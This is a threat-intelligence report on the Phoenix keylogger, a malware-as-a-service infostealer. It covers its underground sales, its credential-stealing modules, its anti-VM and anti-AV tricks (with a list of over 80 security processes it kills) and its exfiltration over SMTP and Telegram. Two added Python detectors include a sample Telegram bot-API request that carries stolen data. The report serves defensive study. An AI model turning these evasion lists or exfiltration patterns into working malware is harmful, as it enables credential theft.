Cybereason’s Nocturnus team is tracking a new keylogger gaining traction among cybercriminals, referred to as Phoenix. The keylogger first emerged in July 2019 with a myriad of information-stealing features.
Those features extend well past logging keystrokes, to the point where we are inclined to classify it as an infostealer. This research explains several aspects of the Phoenix keylogger, including:
A Look at the Underground Community: the ongoing advertising efforts to sell Phoenix and its reception within the underground community.
A Technical Breakdown: a technical breakdown of the Phoenix keylogger, including its info-stealing capabilities, communication via Telegram, and potential persistence.
The Relationship to a Previous Keylogger: the discovery of the Phoenix keylogger’s connection to the “orphaned” Alpha keylogger.
The Phoenix Keylogger: The Cybereason Nocturnus team is investigating multiple incidents of a new, emerging keylogger called Phoenix, and is now able to offer insight into the keylogger’s operations and its author.
Steals Information From Multiple Sources: Phoenix operates under a malware-as-a-service model and steals personal data from almost 20 different browsers, four different mail clients, FTP clients, and chat clients.
Attempts to Stop Over 80 Security Products: On top of its information-stealing features, Phoenix has several defensive and evasive mechanisms to avoid analysis and detection, including an Anti-AV module that attempts to kill the processes of over 80 different security products and analysis tools.
Targets Across Continents: Despite Phoenix having been released in July 2019, it has already targeted victims across North America, the UK, France, Germany and other parts of Europe and the Middle East. We expect more regions to be affected as it gains popularity.
Exfiltrates Data Through Telegram: Phoenix offers the common SMTP and FTP exfiltration protocols, but also supports data exfiltration over Telegram. Telegram, a popular chat application worldwide, is leveraged by cybercriminals for its legitimacy and end-to-end encryption.
Has the Same Author as the Alpha Keylogger: Phoenix was clearly authored by the same group behind the Alpha keylogger, which disappeared earlier this year.
“Malware for the People”: This research showcases the ever-growing popularity of the Malware-as-a-Service model within the cybercrime ecosystem. Malware authors are developing malware that is easy for any user to operate and comes bundled with customer support and a competitive price point. As we move into 2020, we expect to see many less-technical cybercriminals leverage MaaS to commit cybercrime, especially as MaaS authors begin to compete for the most impressive offering.
BACKGROUND: PHOENIX KEYLOGGER
At the end of July 2019, the Cybereason platform detected a malware sample that was classified by some antivirus vendors as Agent Tesla. Upon further review, however, it became clear that this was not Agent Tesla. We were able to determine that this malware was a completely new and previously undocumented malware called the Phoenix keylogger.
Phoenix MaaS model pricing.
Phoenix updated MaaS model pricing.
In searching underground communities, we learned that Phoenix first emerged at the end of July 2019. This keylogger follows the malware-as-a-service (MaaS) model and is sold for $14.99-$25.00 per month by a community member with the handle Illusion.
Illusion’s join date.
Illusion joined the underground community at the end of July 2019 and immediately started advertising the keylogger. This behavior is somewhat unusual, as the underground community typically enforces a strict vetting process for members.
RECEPTION IN THE UNDERGROUND COMMUNITY
Shortly after its release, the Phoenix keylogger caught the attention of the underground community, with numerous members expressing interest in testing the product. The underground community views Phoenix quite favorably because of its stealing capabilities, stability, clean user interface, and customer support.
Example #1: EXTREMELY USER FRIENDLY WITH DOCUMENTATION
This cybercriminal’s review expresses how easy Phoenix is to use. The in-depth review discusses documentation, price, password recovery, and more – all items which are important to maintaining any product.
Example #2: COMES WITH A USER GUIDE AND FRIENDLY CUSTOMER SERVICE
This cybercriminal’s review expresses how Phoenix comes with a user guide and friendly customer service. In particular, they state how the owner of Phoenix is more than willing to help users if they have questions.
Example #3: 101% SUPPORT TO CUSTOMERS
Continued validation of the quality customer support the owner of Phoenix provides.
Illusion’s response to a request for features and recent updates to the changelog.
Reviews of the Phoenix keylogger draw a stark contrast with some other products sold in hacker forums. They praise Illusion’s customer support and positive attitude toward the customer, as opposed to others in the underground community who view their customers solely as cash cows.
These positive reviews suggest Phoenix’s potential for widespread use in the future. Like many modern MaaS offerings, Phoenix gives non-technical and technical users alike easy access to harmful and exploitative software through the proverbial swipe of a credit card. This is further evidence of our ongoing belief that modern MaaS is creating a new class of cybercriminals that profit off of other, less technical cybercriminals.
Additionally, Phoenix shows how some cybercriminals are following some of the same methodologies as legitimate software-as-a-service (SaaS) companies: marketing efforts, relying on positive reviews, responsive customer support, and regularly improving the features of their product are hallmarks of a profitable SaaS business.
MALWARE ANALYSIS
MALWARE CAPABILITIES
The Phoenix keylogger has a number of features that extend far beyond keylogging, including:
Keylogger + Clipboard Stealer
Password Stealing (Browsers, Mail Clients, FTP Clients, Chat Clients)
Data exfiltration via SMTP, FTP or Telegram
Downloader (to download additional malware)
Alleged AV-Killer Module
Anti-debugging and Anti-VM Features
DELIVERY METHOD
By default, Illusion supplies the Phoenix keylogger to customers as a stub. The buyer must use their own methods to deliver the stub to the target machine. The majority of Phoenix infections we observe originate from phishing attempts that leverage a weaponized rich text file (RTF) or Microsoft Office document. These deliveries do not use the more popular malicious macro method, but instead use known exploits. Most commonly, they exploit the Equation Editor vulnerability.
Process tree of the Phoenix infection using a weaponized document.
INFECTED MACHINE PROFILING
Once Phoenix successfully infects the target machine, it profiles the machine to collect information on the operating system, hardware, running processes, users, and its external IP. Phoenix stores the information in memory and sends it back to the attackers immediately, without writing it to disk. Attackers typically do this to be stealthier, since it is harder to know what was exfiltrated if it is never written to disk.
Example of machine profiling information sent to the attackers.
ANTI-ANALYSIS & ANTI-DETECTION FEATURES
It is clear Illusion invested time and effort into protecting Phoenix, as the stub uses a few different techniques to protect itself from inspection.
String Encryption: Most important strings used by the malware are encrypted and only decrypted in memory.
Obfuscation: The stub is obfuscated by what seems to be an implementation of the open source ConfuserEx .NET obfuscator, to prevent accurate decompilation and code inspection.
Illusion recommends the use of an additional third-party crypter to “make it FUD”, or fully undetectable. It is worth noting that most Phoenix samples caught in the wild are packed with a crypter, but are still prevented by the majority of antivirus vendors.
After obtaining basic machine information, Phoenix checks whether it is running in a “hostile” environment. A hostile environment can take different forms: Phoenix deployed in a virtual machine, under a debugger, or on a machine with analysis tools or antivirus products installed. Phoenix also has a set of features in the admin panel to disable different Windows tools, such as CMD, the registry, Task Manager, System Restore, and others.
It is interesting to note that although the user interface used by Phoenix operators appears to support a persistence feature, most samples analyzed by Cybereason did not exhibit persistence behavior following a successful infection. A possible explanation may lie in the attackers’ desire to reduce the risk of overexposure: once Phoenix has obtained the necessary information, there is no need for it to increase the risk of exposure by persisting longer than needed.
The Phoenix keylogger admin panel, with features to disable specific tools.
Let’s dive into some of the methods Phoenix uses to detect a “hostile” environment.
Most of Phoenix’s anti-VM checks are based on known techniques. Given the checks used and their order, we believe they were most likely copy-pasted from the Cyberbit blog. Phoenix performs the checks and terminates itself if it discovers any of the following processes or files on the target machine.
Phoenix checking for various running processes.
Checking for running processes:
Checking for the existence of the following files:
DISABLING WINDOWS DEFENDER
Phoenix attempts to disable the Windows Defender Anti-Spyware module by changing the following registry key.
Phoenix tries to disable Windows Defender Anti-Spyware.
Phoenix’s anti-AV module tries to terminate the processes of a substantial number of security products.
Phoenix terminating the processes of different security products.
Security products Phoenix attempts to terminate:
zlclient, egui, bdagent, npfmsg, olydbg, anubis, wireshark, avastui, _Avp32, vsmon, mbam, keyscrambler, _Avpcc, _Avpm, Ackwin32, Outpost, Anti-Trojan, ANTIVIR, Apvxdwin, ATRACK, Autodown, Avconsol, Ave32, Avgctrl, Avkserv, Avnt, Avp, Avp32, Avpcc, Avpdos32, Avpm, Avptc32, Avpupd, Avsched32, AVSYNMGR, Avwin95, Avwupd32, Blackd, Blackice, Cfiadmin, Cfiaudit, Cfinet, Cfinet32, Claw95, Claw95cf, cleanser, Cleaner3, Defwatch, Dvp95, Dvp95_0, Ecengine, Esafe, Espwatch, F-Agnt95, Findviru, Fprot, F-Prot, F-Prot95, Fp-Win, Frw, F-Stopw, Iamapp, Iamserv, Ibmasn, Ibmavsp, Icload95, Icloadnt, Icmon, Icsupp95, Icsuppnt, Iface, Iomon98, Jedi, Lockdown2000, Lookout, Luall, MCAFEE, Moolive, Mpftray, N32scanw, NAVAPSVC, NAVAPW32, NAVLU32, Navnt, NAVRUNR, Navw32, Navwnt, NeoWatch, NISSERV, Nisum, Nmain, Normist, NORTON, Nupgrade, Nvc95, Outpost, Padmin, Pavcl, Pavsched, Pavw, PCCIOMON, PCCMAIN, Pccwin98, Pcfwallicon, Persfw, POP3TRAP, PVIEW95, Rav7, Rav7win, Rescue, Safeweb, Scan32, Scan95, Scanpm, Scrscan, Serv95, Smc, SMCSERVICE, Snort, Sphinx, Sweep95, SYMPROXYSVC, Tbscan, Tca, Tds2-98, Tds2-Nt, TermiNET, Vet95, Vettray, Vscan40, Vsecomr, Vshwin32, Vsstat, Webscanx, WEBTRAP, Wfindv32, Zonealarm, LOCKDOWN2000, RESCUE32, LUCOMSERVER, avgcc, avgcc, avgamsvr, avgupsvc, avgw, avgcc32, avgserv, avgserv9, avgserv9schedapp, avgemc, ashwebsv, ashdisp, ashmaisv, ashserv, aswUpdSv, symwsc, norton, Norton Auto-Protect, norton_av, nortonav, ccsetmgr, ccevtmgr, avadmin, avcenter, avgnt, avguard, avnotify, avscan, guardgui, nod32krn, nod32kui, clamscan, clamTray, clamWin, freshclam, oladdin, sigtool, w9xpopen, Wclose, cmgrdian, alogserv, mcshield, vshwin32, avconsol, vsstat, avsynmgr, avcmd, avconfig, licmgr, sched, preupd, MsMpEng, MSASCui, Avira.Systray
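The anti-AV module’s observable behavior is one process terminating many security processes in quick succession. As an added detection example (not code from the report or from the malware), the Python below takes a subset of the names in the list above and flags any single process that kills several of them within a short window; the EDR-style termination events are constructed sample data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Subset of the process names the report lists as targets of the anti-AV module.
WATCHED = {n.lower() for n in (
    "MsMpEng", "MSASCui", "avgnt", "avguard", "egui", "bdagent",
    "avastui", "mbam", "wireshark", "olydbg", "nod32krn", "ccsetmgr",
)}

# Constructed sample process-termination telemetry (EDR-style), not real data:
# (timestamp, acting process image, terminated process name)
SAMPLE_EVENTS = [
    ("2019-08-01T10:00:00", r"C:\Users\jdoe\AppData\Roaming\invoice.exe", "MsMpEng.exe"),
    ("2019-08-01T10:00:00", r"C:\Users\jdoe\AppData\Roaming\invoice.exe", "MSASCui.exe"),
    ("2019-08-01T10:00:01", r"C:\Users\jdoe\AppData\Roaming\invoice.exe", "avgnt.exe"),
    ("2019-08-01T10:00:01", r"C:\Users\jdoe\AppData\Roaming\invoice.exe", "notepad.exe"),
    ("2019-08-01T10:00:02", r"C:\Users\jdoe\AppData\Roaming\invoice.exe", "egui.exe"),
    ("2019-08-01T11:30:00", r"C:\Windows\System32\taskmgr.exe", "wireshark.exe"),
    ("2019-08-01T12:00:00", r"C:\Program Files\Updater\setup.exe", "avguard.exe"),
]


def basename_no_ext(image):
    """'C:\\x\\MsMpEng.exe' -> 'msmpeng' so names compare like the malware's list."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return (name.rsplit(".", 1)[0] if "." in name else name).lower()


def find_mass_kills(events, window=timedelta(seconds=60), threshold=3):
    """Return one alert per acting process that terminated at least `threshold`
    distinct watched security processes inside any `window`-long span.
    A legitimate tool killing a single AV process does not trip the rule."""
    per_actor = defaultdict(list)
    for ts, actor, target in events:
        name = basename_no_ext(target)
        if name in WATCHED:
            per_actor[actor].append((datetime.fromisoformat(ts), name))

    alerts = []
    for actor, hits in per_actor.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until hits[start..end] fit in `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            distinct = {n for _, n in hits[start:end + 1]}
            if len(distinct) >= threshold:
                # extend to every hit still inside the window so the alert lists them all
                last = end
                while last + 1 < len(hits) and hits[last + 1][0] - hits[start][0] <= window:
                    last += 1
                distinct = {n for _, n in hits[start:last + 1]}
                alerts.append({"actor": actor, "targets": sorted(distinct),
                               "first_seen": hits[start][0].isoformat()})
                break  # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for alert in find_mass_kills(SAMPLE_EVENTS):
        print(f"{alert['first_seen']} {alert['actor']} killed {alert['targets']}")
```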
PHOENIX’S CORE STEALING FUNCTIONALITY
Once Phoenix finishes checking for a hostile environment, it executes several different stealing modules.
Phoenix attempts to steal credentials and other sensitive information stored locally on the target machine by searching for specific files or registry keys that contain sensitive data. It searches browsers, mail clients, FTP clients, and chat clients.
Browsers: Chrome, Firefox, Opera, Vivaldi, Brave, Blisk, Epic, Avast Browser, SRWare Iron, Comodo, Torch, Slimjet, UC Browser, Orbitum, Coc Coc, QQ Browser, 360 Browser, Liebao
Mail clients: Outlook, Thunderbird, SeaMonkey, Foxmail
Excerpt from Phoenix’s Outlook module.
Excerpt from Phoenix’s Pidgin module.
Phoenix uses a common method of hooking keyboard events for its keylogging. It uses the Windows API function SetWindowsHookExA to capture the pressed keys, then matches them to the corresponding process.
Excerpt from Phoenix’s keylogger hooking function.
Phoenix keylogger functionality matching keystrokes to the relevant process.
NETWORK & C2 COMMUNICATION
Phoenix checks for internet connectivity and obtains the external IP address of the target machine by sending an HTTP GET request to ifconfig.me, a known web service. This service provides Phoenix with the external IP address of the target machine; if there is no internet connectivity, Phoenix terminates itself.
Phoenix determines the external IP of an infected machine using a legitimate web service.
Phoenix can post stolen information in cleartext over SMTP, FTP, or Telegram.
SMTP COMMUNICATION & EXFILTRATION
In the majority of cases, Phoenix posts the stolen information using the SMTP protocol. The stolen data is sent as an email to an email address controlled by the attacker.
Stolen browser data exfiltrated as an email message.
TELEGRAM COMMUNICATION & EXFILTRATION
Alternatively, in some cases Phoenix exfiltrates data by abusing the API of the popular Telegram chat application. This method of exfiltration is quite stealthy, because it abuses Telegram’s legitimate infrastructure. Other malware has also started to use this method, including the Masad Stealer.
Phoenix sends an HTTP request to Telegram’s bot API. This request includes the Telegram API key and the chat ID, and the stolen data is passed via the text parameter in URL encoding.
HTTP request sent to Telegram’s API, extracted from memory.
Telegram HTTP request pattern used by Phoenix.
URL-decoded text posted to a Telegram bot.
The Telegram bot responds with the following details.
The stolen data is passed through Telegram, allowing the user to leverage a legitimate application for malicious communication and exfiltration.
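Both network behaviors described in this section leave a recognizable trace in web proxy logs: a GET to ifconfig.me, then a Telegram bot API call carrying the stolen data in the URL-encoded text parameter. As an added example (not from the report or the malware), the Python below scans constructed proxy log lines for exactly that pattern, recovers the chat ID and the decoded text, and masks the bot token so the alert can be shared safely. The log format, the token and the chat ID are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not real traffic): "<method> <url> <status>".
# The bot token and chat_id below are placeholders, not real identifiers.
SAMPLE_LOG = """\
GET https://ifconfig.me/ip 200
GET https://api.telegram.org/bot123456789:AAExampleTokenAbCdEf/sendMessage?chat_id=987654321&text=PC+Name%3A+VICTIM-PC%0AUser%3A+jdoe%0APasswords%3A+... 200
GET https://www.example.com/index.html 200
POST https://api.telegram.org/bot111111111:BBOtherTokenXyZ/sendMessage 200
"""

# Telegram bot API paths look like /bot<numeric id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(r"^/bot(?P<token>[0-9]+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")


def redact_token(token):
    """Keep the numeric bot id (useful for correlation), mask the secret part."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{'*' * len(secret)}"


def inspect_request(url):
    """Classify one URL; return a finding dict for Phoenix-style traffic, else None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host == "ifconfig.me":
        return {"type": "external_ip_lookup", "host": host}
    if host == "api.telegram.org":
        m = TELEGRAM_BOT_RE.match(parts.path)
        if not m:
            return None
        qs = parse_qs(parts.query)  # parse_qs already URL-decodes ('+' -> ' ', %0A -> '\n')
        return {
            "type": "telegram_bot_api",
            "bot": redact_token(m.group("token")),
            "api_method": m.group("method"),
            "chat_id": qs.get("chat_id", [None])[0],
            "text": qs.get("text", [None])[0],
            "text_in_query": "text" in qs,
        }
    return None


def scan_log(log_text):
    """Walk proxy log lines and collect findings in log order."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        method, url, _status = raw.split(" ", 2)
        finding = inspect_request(url)
        if finding:
            finding["http_method"] = method
            findings.append(finding)
    return findings


def phoenix_like(findings):
    """Heuristic for the sequence in the report: an external IP lookup plus a
    Telegram sendMessage call that carries data in the query string."""
    saw_ip = any(f["type"] == "external_ip_lookup" for f in findings)
    saw_tg = any(f["type"] == "telegram_bot_api" and f["api_method"] == "sendMessage"
                 and f["text_in_query"] for f in findings)
    return saw_ip and saw_tg


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("phoenix-like exfiltration:", phoenix_like(found))
```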
ADDITIONAL COMMUNICATION WITH THE C2 SERVER
At its current stage of development, Phoenix does not appear to use a standard, interactive C2 model. Specifically, it does not expect to receive commands back from the C2 server. Phoenix’s various tasks, like infostealing, downloading additional malware, and spreading through USB, are predefined by the operators in the configuration file before compilation. Phoenix uses the predefined exfiltration method from the configuration file to send out any collected information on execution.
CONNECTING TO ALPHA KEYLOGGER
During our investigation, we discovered that the Phoenix keylogger is actually an evolution of an earlier project, the Alpha keylogger. We believe the Alpha keylogger was authored by the same team behind the Phoenix keylogger.
CODE SIMILARITY among ALPHA AND PHOENIX KEYLOGGER
In order to investigate deeper, we used YARA rules and other techniques to retrieve more samples of Phoenix. One of the samples we retrieved was almost identical to Phoenix, with some parts copy-pasted with the same naming conventions, parameter names, and more. However, the name of the malware as it appeared in logs and in code was consistently Alpha keylogger.
SIMILARITIES BETWEEN DATA SCHEMES
Alpha Keylogger client data scheme
Phoenix Keylogger client data scheme
SIMILARITIES BETWEEN SMTP CONFIGURATIONS
Phoenix Keylogger SMTP configuration
Alpha Keylogger SMTP configuration
SIMILARITIES BETWEEN SMTP FUNCTIONS
Phoenix Keylogger SMTP function
Alpha Keylogger SMTP function
SIMILARITIES BETWEEN SELF-TERMINATION FUNCTIONS
Phoenix Keylogger self-termination function
Alpha Keylogger self-termination function
ALPHA KEYLOGGER OVERVIEW
In searching the underground communities, we found references to the Alpha keylogger starting as early as April 2019. At that time, member Alpha_Coder and, later, member AK_Generation began advertising the keylogger to the underground community.
Alpha keylogger released in April 2019 by Alpha_Coder.
In reviewing Alpha_Coder’s marketing materials, it is clear the two keyloggers are related. They share the exact same features, and the description of the features uses the exact same phraseology and even font.
Phoenix Keylogger marketing
Alpha Keylogger marketing
Additionally, the design of the admin panel for the Alpha keylogger is very similar to the design of the admin panel for the Phoenix keylogger.
Alpha Keylogger admin panel
Phoenix Keylogger admin panel
DISAPPEARANCE OF ALPHA, EMERGENCE OF PHOENIX
At the beginning of July 2019, the two members responsible for marketing the Alpha keylogger went completely silent. This happened just before the emergence of the Phoenix keylogger at the end of July 2019.
The last message by Alpha_Coder, from the beginning of July 2019.
A potential buyer wonders whether the Alpha keylogger is still available.
While it is not entirely clear why the Alpha keylogger was suddenly shut down, chatter in the sales thread gives away potential clues. Alpha_Coder was banned from posting in the forum for one month, for reasons unknown. During that time, AK_Generation led marketing efforts for the Alpha keylogger.
AK_Generation marketing the Alpha keylogger.
AK_Generation was created on April 27, 2019, the same day the Alpha keylogger was first promoted by Alpha_Coder. Interestingly, AK_Generation also disappeared near the release date of the Phoenix keylogger. It is likely that Alpha_Coder and AK_Generation are operated by the same person, and that AK_Generation was created as a backup account for Alpha_Coder.
The last time AK_Generation was seen on the underground community.
We believe the Phoenix keylogger is not just an evolution of the Alpha keylogger, but also an attempt to rebrand and give the author a clean slate in the underground community.
This research breaks down the Phoenix keylogger, an information stealer operating under a malware-as-a-service model and currently under active development. Since its emergence in late July 2019, it has gained popularity in the underground community due to its ease of use, competitive pricing, and personal customer support.
Phoenix is more than just a keylogger: it has extensive information-stealing capabilities, self-defense mechanisms including an anti-AV module that tries to stop over 80 security products, and the ability to exfiltrate data through Telegram. The majority of samples we identified in the wild do not implement a persistence mechanism, nor do they interact bidirectionally with the C2 server. Instead, the stolen information is posted to a pre-configured exfiltration method, which suggests Phoenix is being used primarily as a “set it and forget it” type of malware.
Based on our analysis, Phoenix’s malware-as-a-service model appeals to a wide range of cybercriminals, especially the less sophisticated who do not possess the technical know-how to develop their own successful malware infrastructure. This signals a continued trend of cybercriminals following the malware-as-a-service model to make malware accessible to users of any level. Malware authors are beginning to apply many of the same methodologies as legitimate software-as-a-service companies, including advertising their software, personalized customer support, and an easy user interface, to continuously profit off of other, less technical cybercriminals.
Going into 2020, we expect a proliferation of less-technical cybercriminals leveraging MaaS to target, steal from, and harm individuals, especially as MaaS authors add more features to their offerings.